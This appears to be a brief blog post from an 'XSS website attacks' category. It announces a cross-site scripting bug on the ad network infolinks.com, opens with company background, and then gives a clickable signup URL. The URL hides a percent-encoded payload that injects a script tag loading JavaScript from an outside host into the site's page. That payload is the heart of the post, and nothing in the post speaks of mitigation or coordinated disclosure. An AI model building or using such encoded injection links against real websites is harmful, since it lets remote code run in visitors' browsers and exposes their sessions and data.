XSS bug on infolinks website spotted by rascal .

Before introducing the bugs , i want to say about info links site ,
about this infolinks.com

Infolinks intelligently scans web pages using its dynamic proprietary algorithm and converts carefully selected keywords into relevant Pay Per Click (PPC) in-text ads. These ads appear as double underlined hyperlinks in the Web content itself. The process of integrating in-text ads into websites is short and simple. The basic integration requires the insertion of one line of Javascript code into the website’s html.

Infolinks in-text ads are seen on thousands of websites and are used by content based web publishers as an effective means to monetize.

Infolinks was established in 2007 and is headquarter in Mountain View, California.

this site has a xss bug , 

click the below link

http://www.infolinks.com/signup/your-script.html?denied=true&pid=166387&url=%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%6A%61%76%61%73%63%72%69%70%74%2E%63%6F%6D%2F%31%30%38%31%39%31%34%31%33%32%32%2F%69%6E%66%6F%6C%69%6E%6B%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E

screen shot using another xss bug ,

Posted in: XSS website attacks